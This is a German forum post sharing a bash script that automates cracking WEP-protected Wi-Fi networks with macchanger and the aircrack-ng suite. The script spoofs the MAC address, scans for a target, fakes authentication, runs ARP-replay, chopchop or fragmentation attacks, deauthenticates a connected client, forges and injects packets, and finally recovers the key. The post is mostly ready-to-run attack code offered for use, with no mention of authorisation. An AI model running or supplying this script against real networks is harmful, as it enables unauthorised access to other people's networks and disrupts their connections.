Ich hab hier mal ein kleines Script gebastelt, das den ganzen Vorgang ziemlich weit automatisiert.
Gebraucht werden dafür macchanger und aircrack-ng. Wenn jemand einen Bug findet, bitte reporten.
Code:
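#!/bin/bash
#
# Interactive wrapper around macchanger and the aircrack-ng tools
# (airmon-ng, airodump-ng, aireplay-ng, packetforge-ng, aircrack-ng).
# It prompts for a MAC address, a target MAC and a channel, runs the tools
# against wlan0/mon0 and keeps its capture files in ./wep-cracking.
#
# NOTE(review): airmon-ng, ifconfig and macchanger normally need root, so
# everything below is presumably executed with full privileges. For that
# reason every value typed at a prompt is validated before it reaches a
# command line, and file deletion is confined to the working directory.

readonly DEFAULT_MAC='00:11:11:11:11:11'
readonly MAC_RE='^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
readonly CHANNEL_RE='^[0-9]+$'
readonly WORKDIR='wep-cracking'

# PIDs of the xterm windows this script started in the background.
xterm_pids=()

# Close only the windows opened here. The previous `killall xterm` also
# terminated every unrelated xterm session on the machine.
cleanup() {
  local p
  for p in "${xterm_pids[@]}"; do
    kill "$p" 2>/dev/null
  done
}
trap cleanup EXIT

echo
mac=
while :; do
  echo "enter new mac address (default=${DEFAULT_MAC}): "
  read -r -e mac
  if [[ -z "$mac" ]]; then
    mac=$DEFAULT_MAC
  fi
  if [[ "$mac" =~ $MAC_RE ]]; then
    break
  fi
  echo "invalid mac address, expected xx:xx:xx:xx:xx:xx" >&2
done

airmon-ng stop mon0
airmon-ng stop wlan0
airmon-ng start wlan0
clear
echo "##############################################"
echo "[+] Spoofing Mac"
echo "##############################################"
ifconfig wlan0 down
ifconfig mon0 down
macchanger -m "$mac" wlan0
macchanger -m "$mac" mon0
ifconfig wlan0 up
ifconfig mon0 up

# Stop if the working directory cannot be entered: the rm below would
# otherwise delete *.cap/*.csv/... from whatever directory the script was
# started in.
if ! mkdir -p -- "$WORKDIR" || ! cd -- "$WORKDIR"; then
  echo "cannot enter working directory: $WORKDIR" >&2
  exit 1
fi

xterm -geometry 100x15+1+0 -T "Who is online?" -bg black -fg green -e airodump-ng mon0 &
scan_pid=$!
xterm_pids+=("$scan_pid")

# Re-prompt until the reply has the expected shape; give up on EOF instead
# of spinning forever.
target=
until [[ "$target" =~ $MAC_RE ]]; do
  printf 'Select target mac: '
  read -r -e target || exit 1
done
channel=
until [[ "$channel" =~ $CHANNEL_RE ]]; do
  printf 'Select target channel: '
  read -r -e channel || exit 1
done

kill "$scan_pid"
xterm_pids=()

# Remove output of earlier runs; ./ and -- keep odd file names from being
# parsed as options, -f replaces the former 2>/dev/null for missing files.
rm -f -- ./*.cap ./*.netxml ./*.xor ./*.csv

xterm -geometry 100x15+1+0 -T "Collect Data" -bg black -fg green -e airodump-ng mon0 -c "$channel" -w data &
xterm_pids+=("$!")
sleep 1
echo "##############################################"
echo "[+] fake authentication"
echo "##############################################"
aireplay-ng -1 0 -a "$target" -h "$mac" mon0

attack=
until [[ "$attack" == [1-4] ]]; do
  echo "###########attacking-methods##################"
  echo "arp-replay = 1"
  echo "chopchop = 2"
  echo "fragmentation = 3"
  echo "exit = 4"
  echo "##############################################"
  printf 'Select attack: '
  read -r -e attack || exit 1
done

case "$attack" in
  1)
    # An empty reply used to make "-c" swallow the interface name as its
    # argument; insist on a well-formed address instead.
    target_client=
    until [[ "$target_client" =~ $MAC_RE ]]; do
      printf 'Select client mac for disconnect: '
      read -r -e target_client || exit 1
    done
    echo "##############################################"
    echo "[+] starting arp-responder"
    echo "##############################################"
    xterm -geometry 100x15+0+230 -T "arp-responder" -bg black -fg green -e aireplay-ng -3 -b "$target" -h "$mac" mon0 &
    xterm_pids+=("$!")
    echo "[+] disconnecting target"
    aireplay-ng -0 1 -a "$target" -c "$target_client" mon0
    ;;
  2)
    # The values travel as positional parameters of sh -c rather than being
    # pasted into the command string, so prompt input is never re-parsed as
    # shell syntax.
    xterm -geometry 100x15+0+230 -T "chopchop" -bg black -fg green \
      -e sh -c 'echo y | aireplay-ng -4 -b "$1" -h "$2" mon0' sh "$target" "$mac"
    ;;
  3)
    xterm -geometry 100x15+0+230 -T "fragmentation" -bg black -fg green \
      -e sh -c 'echo y | aireplay-ng -5 -b "$1" -h "$2" mon0' sh "$target" "$mac"
    ;;
  4)
    # The EXIT trap closes the windows opened above.
    exit 0
    ;;
esac
sleep 2

# Collect *.xor files with a glob; the old $(find *.xor) printed an error
# when none existed and word-split its result when several did.
shopt -s nullglob
xor_files=(./*.xor)
shopt -u nullglob
if (( ${#xor_files[@]} > 0 )); then
  packetforge-ng -0 -a "$target" -h "$mac" -k 255.255.255.255 -l 255.255.255.255 -y "${xor_files[0]}" -w packet
  xterm -geometry 100x15+0+230 -T "injecting packet..." -bg black -fg green -e "echo y | aireplay-ng -2 -r packet mon0" &
  xterm_pids+=("$!")
fi

clear
echo to start cracking press enter
read -r _
aircrack-ng -b "$target" data-01.cap
exit 0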